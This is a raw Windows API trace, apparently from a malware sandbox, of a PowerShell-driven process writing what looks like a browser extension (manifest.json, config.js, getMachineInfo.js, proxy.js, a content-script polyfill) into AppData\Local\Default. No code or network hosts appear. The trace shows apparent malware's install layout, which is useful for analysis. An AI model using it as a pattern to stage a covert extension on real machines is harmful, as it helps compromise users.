lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default", lpFilePart=0x0) returned 0x28 [0164.623] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e244) returned 1 [0164.623] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default"), fInfoLevelId=0x0, lpFileInformation=0x5a0e508 | out: lpFileInformation=0x5a0e508*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8368b360, ftCreationTime.dwHighDateTime=0x1d94ef4, ftLastAccessTime.dwLowDateTime=0x839ab040, ftLastAccessTime.dwHighDateTime=0x1d94ef4, ftLastWriteTime.dwLowDateTime=0x839ab040, ftLastWriteTime.dwHighDateTime=0x1d94ef4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0164.623] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e240) returned 1 [0164.623] EtwEventActivityIdControl () returned 0x0 [0164.623] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\manifest.json", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0164.623] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\manifest.json", nBufferLength=0x37, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\manifest.json", lpFilePart=0x0) returned 0x36 [0164.623] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e6d8) returned 1 [0164.624] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\manifest.json" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\manifest.json"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0164.624] GetFileType (hFile=0x36c) returned 0x1 [0164.624] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e6d4) returned 1 [0164.624] GetFileType (hFile=0x36c) returned 0x1 [0164.624] WriteFile (in: hFile=0x36c, lpBuffer=0x26c1a70*, nNumberOfBytesToWrite=0x4b7, lpNumberOfBytesWritten=0x5a0e75c, lpOverlapped=0x0 | out: lpBuffer=0x26c1a70*, lpNumberOfBytesWritten=0x5a0e75c*=0x4b7, lpOverlapped=0x0) returned 1 [0164.626] CloseHandle (hObject=0x36c) returned 1 [0164.630] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.630] EtwEventActivityIdControl () returned 0x0 [0164.630] EtwEventActivityIdControl () returned 0x0 [0164.630] EtwEventActivityIdControl () returned 0x0 [0164.632] EtwEventActivityIdControl () returned 0x0 [0164.633] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.633] EtwEventActivityIdControl () returned 0x0 [0164.633] EtwEventActivityIdControl () returned 0x0 [0164.633] EtwEventActivityIdControl () returned 0x0 [0164.635] EtwEventActivityIdControl () returned 0x0 [0164.636] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.636] EtwEventActivityIdControl () returned 0x0 [0164.636] EtwEventActivityIdControl () returned 0x0 [0164.636] EtwEventActivityIdControl () returned 0x0 [0164.641] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e244) returned 1 [0164.641] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions"), fInfoLevelId=0x0, lpFileInformation=0x5a0e508 | out: lpFileInformation=0x5a0e508*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x839d11a0, ftCreationTime.dwHighDateTime=0x1d94ef4, ftLastAccessTime.dwLowDateTime=0x83b740c0, ftLastAccessTime.dwHighDateTime=0x1d94ef4, ftLastWriteTime.dwLowDateTime=0x83b740c0, ftLastWriteTime.dwHighDateTime=0x1d94ef4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0164.642] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e240) returned 1 [0164.642] EtwEventActivityIdControl () returned 0x0 [0164.642] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e6d8) returned 1 [0164.642] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\resolve.js" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions\\resolve.js"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0164.646] GetFileType (hFile=0x36c) returned 0x1 [0164.646] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e6d4) returned 1 [0164.646] GetFileType (hFile=0x36c) returned 0x1 [0164.646] WriteFile (in: hFile=0x36c, lpBuffer=0x26d5984*, nNumberOfBytesToWrite=0xf94, lpNumberOfBytesWritten=0x5a0e75c, lpOverlapped=0x0 | out: lpBuffer=0x26d5984*, lpNumberOfBytesWritten=0x5a0e75c*=0xf94, lpOverlapped=0x0) returned 1 [0164.648] CloseHandle (hObject=0x36c) returned 1 [0164.654] EtwEventActivityIdControl () returned 0x0 [0164.654] EtwEventActivityIdControl () returned 0x0 [0164.654] EtwEventActivityIdControl () returned 0x0 [0164.655] EtwEventActivityIdControl () returned 0x0 [0164.655] EtwEventActivityIdControl () returned 0x0 [0164.655] EtwEventActivityIdControl () returned 0x0 [0164.655] EtwEventActivityIdControl () returned 0x0 [0164.656] EtwEventActivityIdControl () returned 0x0 [0164.656] EtwEventActivityIdControl () returned 0x0 [0164.656] EtwEventActivityIdControl () returned 0x0 [0164.656] EtwEventActivityIdControl () returned 0x0 [0164.658] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e244) returned 1 [0164.658] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions"), fInfoLevelId=0x0, lpFileInformation=0x5a0e508 | out: lpFileInformation=0x5a0e508*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x839d11a0, ftCreationTime.dwHighDateTime=0x1d94ef4, ftLastAccessTime.dwLowDateTime=0x83be64e0, ftLastAccessTime.dwHighDateTime=0x1d94ef4, ftLastWriteTime.dwLowDateTime=0x83be64e0, ftLastWriteTime.dwHighDateTime=0x1d94ef4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0164.659] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e240) returned 1 [0164.659] EtwEventActivityIdControl () returned 0x0 [0164.659] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e6d8) returned 1 [0164.659] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\getMachineInfo.js" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions\\getmachineinfo.js"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0164.660] GetFileType (hFile=0x36c) returned 0x1 [0164.660] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e6d4) returned 1 [0164.660] GetFileType (hFile=0x36c) returned 0x1 [0164.660] WriteFile (in: hFile=0x36c, lpBuffer=0x26d6aa4*, nNumberOfBytesToWrite=0x1073, lpNumberOfBytesWritten=0x5a0e788, lpOverlapped=0x0 | out: lpBuffer=0x26d6aa4*, lpNumberOfBytesWritten=0x5a0e788*=0x1073, lpOverlapped=0x0) returned 1 [0164.661] CloseHandle (hObject=0x36c) returned 1 [0164.663] EtwEventActivityIdControl () returned 0x0 [0164.663] EtwEventActivityIdControl () returned 0x0 [0164.663] EtwEventActivityIdControl () returned 0x0 [0164.663] EtwEventActivityIdControl () returned 0x0 [0164.664] EtwEventActivityIdControl () returned 0x0 [0164.664] EtwEventActivityIdControl () returned 0x0 [0164.664] EtwEventActivityIdControl () returned 0x0 [0164.664] EtwEventActivityIdControl () returned 0x0 [0164.664] EtwEventActivityIdControl () returned 0x0 [0164.665] EtwEventActivityIdControl () returned 0x0 [0164.665] EtwEventActivityIdControl () returned 0x0 [0164.666] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e244) returned 1 [0164.667] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default"), fInfoLevelId=0x0, lpFileInformation=0x5a0e508 | out: lpFileInformation=0x5a0e508*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8368b360, ftCreationTime.dwHighDateTime=0x1d94ef4, ftLastAccessTime.dwLowDateTime=0x83b9a220, ftLastAccessTime.dwHighDateTime=0x1d94ef4, ftLastWriteTime.dwLowDateTime=0x83b9a220, ftLastWriteTime.dwHighDateTime=0x1d94ef4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0164.667] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e240) returned 1 [0164.667] EtwEventActivityIdControl () returned 0x0 [0164.667] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e6d8) returned 1 [0164.667] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\ico.png" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\ico.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0164.668] GetFileType (hFile=0x36c) returned 0x1 [0164.668] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e6d4) returned 1 [0164.668] GetFileType (hFile=0x36c) returned 0x1 [0164.668] WriteFile (in: hFile=0x36c, lpBuffer=0x26fa250*, nNumberOfBytesToWrite=0xf44, lpNumberOfBytesWritten=0x5a0e75c, lpOverlapped=0x0 | out: lpBuffer=0x26fa250*, lpNumberOfBytesWritten=0x5a0e75c*=0xf44, lpOverlapped=0x0) returned 1 [0164.669] CloseHandle (hObject=0x36c) returned 1 [0164.674] EtwEventActivityIdControl () returned 0x0 [0164.674] EtwEventActivityIdControl () returned 0x0 [0164.674] EtwEventActivityIdControl () returned 0x0 [0164.674] EtwEventActivityIdControl () returned 0x0 [0164.675] EtwEventActivityIdControl () returned 0x0 [0164.675] EtwEventActivityIdControl () returned 0x0 [0164.675] EtwEventActivityIdControl () returned 0x0 [0164.676] EtwEventActivityIdControl () returned 0x0 [0164.677] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.678] EtwEventActivityIdControl () returned 0x0 [0164.678] EtwEventActivityIdControl () returned 0x0 [0164.678] EtwEventActivityIdControl () returned 0x0 [0164.683] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions")) returned 0x2010 [0164.683] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0164.684] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions", nBufferLength=0x37, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions", lpFilePart=0x0) returned 0x36 [0164.684] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e244) returned 1 [0164.684] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions"), fInfoLevelId=0x0, lpFileInformation=0x5a0e508 | out: lpFileInformation=0x5a0e508*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x839d11a0, ftCreationTime.dwHighDateTime=0x1d94ef4, ftLastAccessTime.dwLowDateTime=0x83be64e0, ftLastAccessTime.dwHighDateTime=0x1d94ef4, ftLastWriteTime.dwLowDateTime=0x83be64e0, ftLastWriteTime.dwHighDateTime=0x1d94ef4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0164.684] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e240) returned 1 [0164.684] EtwEventActivityIdControl () returned 0x0 [0164.684] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\proxy.js", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x40 [0164.684] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\proxy.js", nBufferLength=0x40, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\proxy.js", lpFilePart=0x0) returned 0x3f [0164.684] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e6d8) returned 1 [0164.685] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\proxy.js" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions\\proxy.js"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0164.685] GetFileType (hFile=0x36c) returned 0x1 [0164.685] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e6d4) returned 1 [0164.685] GetFileType (hFile=0x36c) returned 0x1 [0164.685] WriteFile (in: hFile=0x36c, lpBuffer=0x26fb384*, nNumberOfBytesToWrite=0x2f43, lpNumberOfBytesWritten=0x5a0e788, lpOverlapped=0x0 | out: lpBuffer=0x26fb384*, lpNumberOfBytesWritten=0x5a0e788*=0x2f43, lpOverlapped=0x0) returned 1 [0164.687] CloseHandle (hObject=0x36c) returned 1 [0164.690] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.691] EtwEventActivityIdControl () returned 0x0 [0164.691] EtwEventActivityIdControl () returned 0x0 [0164.691] EtwEventActivityIdControl () returned 0x0 [0164.693] EtwEventActivityIdControl () returned 0x0 [0164.693] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.694] EtwEventActivityIdControl () returned 0x0 [0164.694] EtwEventActivityIdControl () returned 0x0 [0164.694] EtwEventActivityIdControl () returned 0x0 [0164.696] EtwEventActivityIdControl () returned 0x0 [0164.697] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.697] EtwEventActivityIdControl () returned 0x0 [0164.697] EtwEventActivityIdControl () returned 0x0 [0164.697] EtwEventActivityIdControl () returned 0x0 [0164.704] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default")) returned 0x2010 [0164.704] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x29 [0164.704] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default", nBufferLength=0x29, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default", lpFilePart=0x0) returned 0x28 [0164.704] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e244) returned 1 [0164.704] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default"), fInfoLevelId=0x0, lpFileInformation=0x5a0e508 | out: lpFileInformation=0x5a0e508*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8368b360, ftCreationTime.dwHighDateTime=0x1d94ef4, ftLastAccessTime.dwLowDateTime=0x83c0c640, ftLastAccessTime.dwHighDateTime=0x1d94ef4, ftLastWriteTime.dwLowDateTime=0x83c0c640, ftLastWriteTime.dwHighDateTime=0x1d94ef4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0164.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e240) returned 1 [0164.705] EtwEventActivityIdControl () returned 0x0 [0164.705] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\config.js", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x33 [0164.705] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\config.js", nBufferLength=0x33, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\config.js", lpFilePart=0x0) returned 0x32 [0164.705] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e6d8) returned 1 [0164.705] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\config.js" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\config.js"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0164.706] GetFileType (hFile=0x36c) returned 0x1 [0164.706] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e6d4) returned 1 [0164.706] GetFileType (hFile=0x36c) returned 0x1 [0164.706] WriteFile (in: hFile=0x36c, lpBuffer=0x271f980*, nNumberOfBytesToWrite=0x6a, lpNumberOfBytesWritten=0x5a0e75c, lpOverlapped=0x0 | out: lpBuffer=0x271f980*, lpNumberOfBytesWritten=0x5a0e75c*=0x6a, lpOverlapped=0x0) returned 1 [0164.708] CloseHandle (hObject=0x36c) returned 1 [0164.710] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.710] EtwEventActivityIdControl () returned 0x0 [0164.711] EtwEventActivityIdControl () returned 0x0 [0164.711] EtwEventActivityIdControl () returned 0x0 [0164.712] EtwEventActivityIdControl () returned 0x0 [0164.713] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.713] EtwEventActivityIdControl () returned 0x0 [0164.713] EtwEventActivityIdControl () returned 0x0 [0164.713] EtwEventActivityIdControl () returned 0x0 [0164.715] EtwEventActivityIdControl () returned 0x0 [0164.716] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.716] EtwEventActivityIdControl () returned 0x0 [0164.716] EtwEventActivityIdControl () returned 0x0 [0164.716] EtwEventActivityIdControl () returned 0x0 [0164.725] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\modules" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\modules")) returned 0xffffffff [0164.725] EtwEventActivityIdControl () returned 0x0 [0164.725] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.726] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.726] EtwEventActivityIdControl () returned 0x0 [0164.726] EtwEventActivityIdControl () returned 0x0 [0164.726] EtwEventActivityIdControl () returned 0x0 [0164.730] EtwEventActivityIdControl () returned 0x0 [0164.730] EtwEventActivityIdControl () returned 0x0 [0164.730] EtwEventActivityIdControl () returned 0x0 [0164.731] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\modules" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\modules")) returned 0xffffffff [0164.731] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x29 [0164.731] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default", nBufferLength=0x29, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default", lpFilePart=0x0) returned 0x28 [0164.731] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\modules", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x31 [0164.731] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\modules", nBufferLength=0x31, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\modules", lpFilePart=0x0) returned 0x30 [0164.732] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e0b8) returned 1 [0164.732] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\modules" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\modules"), fInfoLevelId=0x0, lpFileInformation=0x5a0e37c | out: lpFileInformation=0x5a0e37c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0164.732] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e0b4) returned 1 [0164.732] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e0b8) returned 1 [0164.732] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\modules" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\modules"), fInfoLevelId=0x0, lpFileInformation=0x5a0e37c | out: lpFileInformation=0x5a0e37c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0164.732] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e0b4) returned 1 [0164.732] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e0b8) returned 1 [0164.732] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default"), fInfoLevelId=0x0, lpFileInformation=0x5a0e37c | out: lpFileInformation=0x5a0e37c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8368b360, ftCreationTime.dwHighDateTime=0x1d94ef4, ftLastAccessTime.dwLowDateTime=0x83c58900, ftLastAccessTime.dwHighDateTime=0x1d94ef4, ftLastWriteTime.dwLowDateTime=0x83c58900, ftLastWriteTime.dwHighDateTime=0x1d94ef4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0164.732] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e0b4) returned 1 [0164.732] CreateDirectoryW (lpPathName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\modules" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\modules"), lpSecurityAttributes=0x0) returned 1 [0164.733] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\modules", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x31 [0164.733] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\modules", nBufferLength=0x31, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\modules", lpFilePart=0x0) returned 0x30 [0164.733] EtwEventActivityIdControl () returned 0x0 [0164.733] EtwEventActivityIdControl () returned 0x0 [0164.734] EtwEventActivityIdControl () returned 0x0 [0164.734] EtwEventActivityIdControl () returned 0x0 [0164.734] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\modules\\content-scripts-register-polyfill.4.0.0.js", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0164.734] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\modules\\content-scripts-register-polyfill.4.0.0.js", nBufferLength=0x5c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\modules\\content-scripts-register-polyfill.4.0.0.js", lpFilePart=0x0) returned 0x5b [0164.734] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e6d8) returned 1 [0164.734] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\modules\\content-scripts-register-polyfill.4.0.0.js" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\modules\\content-scripts-register-polyfill.4.0.0.js"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0164.735] GetFileType (hFile=0x36c) returned 0x1 [0164.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e6d4) returned 1 [0164.735] GetFileType (hFile=0x36c) returned 0x1 [0164.735] WriteFile (in: hFile=0x36c, lpBuffer=0x2720ab0*, nNumberOfBytesToWrite=0x2180, lpNumberOfBytesWritten=0x5a0e788, lpOverlapped=0x0 | out: lpBuffer=0x2720ab0*, lpNumberOfBytesWritten=0x5a0e788*=0x2180, lpOverlapped=0x0) returned 1 [0164.737] CloseHandle (hObject=0x36c) returned 1 [0164.742] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.742] EtwEventActivityIdControl () returned 0x0 [0164.742] EtwEventActivityIdControl () returned 0x0 [0164.742] EtwEventActivityIdControl () returned 0x0 [0164.744] EtwEventActivityIdControl () returned 0x0 [0164.744] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.745] EtwEventActivityIdControl () returned 0x0 [0164.745] EtwEventActivityIdControl () returned 0x0 [0164.745] EtwEventActivityIdControl () returned 0x0 [0164.747] EtwEventActivityIdControl () returned 0x0 [0164.747] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.748] EtwEventActivityIdControl () returned 0x0 [0164.748] EtwEventActivityIdControl () returned 0x0 [0164.748] EtwEventActivityIdControl () returned 0x0 [0164.764] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\mails" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\mails")) returned 0xffffffff [0164.764] EtwEventActivityIdControl () returned 0x0 [0164.765] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.765] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.766] EtwEventActivityIdControl () returned 0x0 [0164.766] EtwEventActivityIdControl () returned 0x0 